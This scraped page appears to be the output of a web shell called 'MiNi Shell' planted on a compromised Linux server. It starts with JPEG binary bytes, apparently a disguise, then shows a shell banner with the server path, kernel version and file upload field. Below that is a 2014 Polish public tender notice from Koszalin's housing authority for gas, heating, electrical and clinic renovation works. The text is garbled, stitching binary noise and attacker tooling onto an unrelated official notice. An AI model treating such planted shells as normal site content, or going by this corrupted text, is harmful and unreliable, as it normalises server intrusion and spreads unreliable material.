JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140912/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140912/194975-N-2014.html

<p class="kh_header"><b>Koszalin: 1. Przebudowa wewnętrznej instalacji gazowej n/c i przebudowa wewnętrznej instalacji c.o. w lokalu mieszkalnym  przy ul. Marszałka Józefa Piłsudskiego 73/4 w Koszalinie;
2. Wymiana instalacji elektrycznych w lokalach mieszkalnych zarządzanych przez ZGM 1 i ZGM 4;
3. Przebudowa części pomieszczeń budynku Przychodni Lekarskiej - pomieszczenia Przychodni Rehabilitacyjnej w budynku przychodni przy Al. Monte Cassino 13 w Koszalinie</b><br>
<b>Numer ogłoszenia: 194975 - 2014; data zamieszczenia: 12.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin Zarząd Budynków Mieszkalnych , ul. Połczyńska 24, 75-815 Koszalin, woj. zachodniopomorskie, tel. 094 3409106, 3409107, faks 094 3409196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zbm.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Przebudowa wewnętrznej instalacji gazowej n/c i przebudowa wewnętrznej instalacji c.o. w lokalu mieszkalnym  przy ul. Marszałka Józefa Piłsudskiego 73/4 w Koszalinie;
2. Wymiana instalacji elektrycznych w lokalach mieszkalnych zarządzanych przez ZGM 1 i ZGM 4;
3. Przebudowa części pomieszczeń budynku Przychodni Lekarskiej - pomieszczenia Przychodni Rehabilitacyjnej w budynku przychodni przy Al. Monte Cassino 13 w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 obejmuje: Przebudowę wewnętrznej instalacji gazowej n/c i przebudowę wewnętrznej instalacji c.o. w lokalu mieszkalnym  przy ul. Marszałka Józefa Piłsudskiego 73/4 w Koszalinie.

Część nr 2 obejmuje:  Wymianę instalacji elektrycznych w lokalach mieszkalnych zarządzanych przez ZGM 1 i ZGM 4:
1)  ZGM 1 - w lokalach mieszkalnych  przy ul. Morskiej 84/4,  Hanki Sawickiej 10a/9 w Koszalinie 
2) ZGM 4 - w lokalach mieszkalnych przy ul. Radogoszczańskiej 5/2, 5/3, Poprzecznej 6B/10, Połczyńskiej 71/45, 71/14, Krakusa i Wandy 28/3, 28/2, 18/6, Walerego Wróblewskiego 10/4, Kolejowej 49/5, Bolesława Chrobrego 14/1, Powstańców Wielkopolskich 16/39, 22/8, Heleny Modrzejewskiej 41/2, Lutyków 27/2, Lechickiej 3/6 w Koszalinie.

Część nr 3 obejmuje:  Przebudowę części pomieszczeń budynku Przychodni Lekarskiej - pomieszczenia Przychodni Rehabilitacyjnej w budynku przychodni przy Al. Monte Cassino 13 w Koszalinie.
Zakres robót: 
wymiana instalacji elektrycznej, przebudowa pomieszczeń zgodnie z PB, roboty sanitarne, remont holu wejściowego i klatki schodowej bocznej, remont schodów wejściowych i podjazdu, montaż 3 wycieraczek w wejściu do budynku, montaż wentylacji mechanicznej w pomieszczeniach rehabilitacji.
UWAGA! Roboty prowadzone będą w czynnym obiekcie w związku z tym wykonawca musi zachować szczególna ostrożność i dostosować się do godzin pracy przychodni.
Szczegółowe zakresy robót dla części nr 1 i 3 zostały określone w P.B., kosztorysach nakładczych i STWiOR; dla części nr 2  kosztorysach nakładczych i STWiOR   stanowiących załączniki  specyfikacji istotnych warunków zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.33.30.00-0, 45.33.11.00-7, 45.31.10.00-0, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę   winien wykazać, że:  
w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej: 
dla części nr 1  zamówienia:
jedną  robotę budowlaną polegającą na wykonaniu lub wymianie wewnętrznej instalacji gazowej  o wartości robót brutto nie mniejszej niż  5.000,00 PLN.
oraz
b) jedną  robotę budowlaną polegającą na wykonaniu  lub wymianie wewnętrznej instalacji c.o.   o wartości robót brutto nie mniejszej niż 10.000,00  PLN.
Uwaga!
Zamawiający uzna również, że wykonawca wykazał spełnienie warunku wiedzy i doświadczenia, jeżeli wykaże  się wykonaniem ww. robót budowlanych w ramach jednej umowy/jednego kontraktu.
dla części nr 2  zamówienia:
jedną  robotę budowlaną polegającą na wykonaniu lub wymianie wewnętrznych instalacji elektrycznych o wartości brutto nie mniejszej niż 50.000,00 PLN.
dla części nr 3  zamówienia:
jedną  robotę budowlaną polegającą na  budowie, przebudowie lub remoncie budynku lub lokalu/li.
Wartość wykonanych robót (w jednym obiekcie) brutto nie może być  mniejsza niż 250.000,000 PLN, w tej wartości i zakresie wykazanej roboty muszą się znaleźć roboty polegające na wykonaniu robót budowlanych o wartości brutto nie mniejszej niż  150.000,00 PLN oraz  wykonaniu wewnętrznych instalacji elektrycznych o wartości brutto nie mniejszej niż  50.000,00 PLN i wykonaniu wentylacji mechanicznej pomieszczeń  o wartości brutto nie mniejszej niż  50.000,00 PLN.
UWAGA
1. W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo roboty, o których wyżej mowa.
2. W przypadku wykazania robót rozliczanych w walucie innej niż PLN wykonawca winien przeliczyć ich wartość na PLN przyjmując:
a) średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych,
b) jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę na część nr  1   winien wykazać, że:  
a) dysponuje lub będzie dysponował jedną osobą przewidzianą do pełnienia funkcji kierownika robót sanitarnych, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego, 
b) dysponuje lub będzie dysponował co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą świadectwa kwalifikacyjne  D i E do wykonywania instalacji gazowych lub dysponuje minimum jedną osobą posiadającą świadectwo kwalifikacyjne  D do wykonywania instalacji gazowych i minimum jedną osobą posiadającą świadectwo kwalifikacyjne E do wykonywania instalacji gazowych.

Wykonawca składający ofertę na część nr  3   winien wykazać, że:  
a) dysponuje lub będzie dysponował   jedną osobą przewidzianą do pełnienia funkcji kierownika budowy, która posiada  uprawnienia budowlane w  specjalności konstrukcyjno - budowlanej   wraz z ważnym zaświadczeniem o przynależności do właściwej  izby 
samorządu zawodowego,
b) dysponuje lub będzie dysponował jedną osobą przewidzianą do pełnienia funkcji kierownika robót sanitarnych, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego, 
c) dysponuje lub będzie dysponował jedną osobą przewidzianą do pełnienia funkcji kierownika robót elektrycznych posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego.
Dopuszcza się łączenie maksymalnie 2 funkcji przez jedną osobę w przypadku posiadania uprawnień budowlanych w kilku specjalnościach (dot. części nr 3).
UWAGA
Osoby pełniące funkcje  kierownika budowy  muszą posiadać stosowne uprawnienia  zgodne  z ustawą z dnia 7 lipca 1994r. Prawo budowlane ( Dz. U.z 2010r. nr 243, poz. 1623 ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa  z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r. nr 83, poz. 578 ze zm.) lub  ważne odpowiadające im kwalifikacje, nadane na podstawie  wcześniej obowiązujących przepisów, upoważniające do kierowania robotami w zakresie objętym niniejszym zamówieniem.
W przypadku wykonawców zagranicznych dopuszcza się również kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz .U. z 2008r. Nr 63, poz. 394 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.
UWAGA:
Dotyczy części 1: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu muszą spełnić:
warunek określony w pkt III.3.1); III.3.3); III.3.4); III.3.5)  - co najmniej jeden wykonawca lub wszyscy wykonawcy wspólnie.
warunek określony w pkt III..3.2) - co najmniej jeden wykonawca.   
Dotyczy części 2: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu muszą spełnić:
warunek określony w pkt III. 3.1); III.3.3): III.3.4); III.3.5) -  co najmniej jeden wykonawca lub wszyscy wykonawcy wspólnie.
warunek określony w pkt III.3.2)  - co najmniej jeden wykonawca.   
Dotyczy części 3: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu muszą spełnić:
warunek określony w pkt III.3.1; III.3.3); III.3.4); III.3.5) -  co najmniej jeden wykonawca lub wszyscy wykonawcy wspólnie.
warunek określony w pkt III.3.20 - co najmniej jeden wykonawca.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentami zawierającymi oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednia datą wymaganą dla tych dokumentów. 2) Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawiera projekt umowy stanowiący załącznik  specyfikacji istotnych warunków zamówienia.
2. Zakres i warunki zmian związanych z umową zostały określone we wzorze umowy stanowiącej załącznik specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zbm.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Mieszkalnych 75-815 Koszalin ul. Połczyńska 24 p. 212 lub za zaliczeniem pocztowym. Koszt siwz w formie papierowej 12,30. Siwz dostępna bezpłatnie na stronie internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 09:55, miejsce: Zarząd Budynków Mieszkalch, 75-815 Koszalin, ul. Połczyńska 24 p. 307 (sekretariat) lub p. 212 (biuro zamówień publicznych).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa wewnętrznej instalacji gazowej n/c i przebudowa wewnętrznej instalacji c.o. w lokalu mieszkalnym  przy ul. Marszałka Józefa Piłsudskiego 73/4 w Koszalinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowę wewnętrznej instalacji gazowej n/c i przebudowę wewnętrznej instalacji c.o. w lokalu mieszkalnym  przy ul. Marszałka Józefa Piłsudskiego 73/4 w Koszalinie.
Szczegółowy zakres robót  został określony w P.B., kosztorysach nakładczych i STWiOR stanowiących załączniki specyfikacji istotnych warunków zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.33.30.00-0, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana instalacji elektrycznych w lokalach mieszkalnych zarządzanych przez ZGM 1 i ZGM 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana instalacji elektrycznych w lokalach mieszkalnych zarządzanych przez ZGM 1 i ZGM 4:
1)  ZGM 1 - w lokalach mieszkalnych  przy ul. Morskiej 84/4,  Hanki Sawickiej 10a/9 w Koszalinie.
2) ZGM 4 - w lokalach mieszkalnych przy ul. Radogoszczańskiej 5/2, 5/3, Poprzecznej 6B/10, Połczyńskiej 71/45, 71/14, Krakusa i Wandy 28/3, 28/2, 18/6, Walerego Wróblewskiego 10/4, Kolejowej 49/5, Bolesława Chrobrego 14/1, Powstańców Wielkopolskich 16/39, 22/8, Heleny Modrzejewskiej 41/2, Lutyków 27/2, Lechickiej 3/6 w Koszalinie.
Szczegółowy zakres  robót został określonyw kosztorysach nakładczych i STWiOR    stanowiących załączniki specyfikacji istotnych warunków zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa części pomieszczeń budynku Przychodni Lekarskiej - pomieszczenia Przychodni Rehabilitacyjnej w budynku przychodni przy Al. Monte Cassino 13 w Koszalinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa części pomieszczeń budynku Przychodni Lekarskiej - pomieszczenia Przychodni Rehabilitacyjnej w budynku przychodni przy Al. Monte Cassino 13 w Koszalinie.
Zakres robót: 
wymiana instalacji elektrycznej, przebudowa pomieszczeń zgodnie z PB, roboty sanitarne, remont holu wejściowego i klatki schodowej bocznej, remont schodów wejściowych i podjazdu, montaż 3 wycieraczek w wejściu do budynku, montaż wentylacji mechanicznej w pomieszczeniach rehabilitacji.
UWAGA! Roboty prowadzone będą w czynnym obiekcie w związku z tym wykonawca musi zachować szczególną ostrożność i dostosować się do godzin pracy przychodni.
Szczegółowy zakres robót został określony w P.B., kosztorysach nakładczych i STWiOR stanowiących załączniki specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com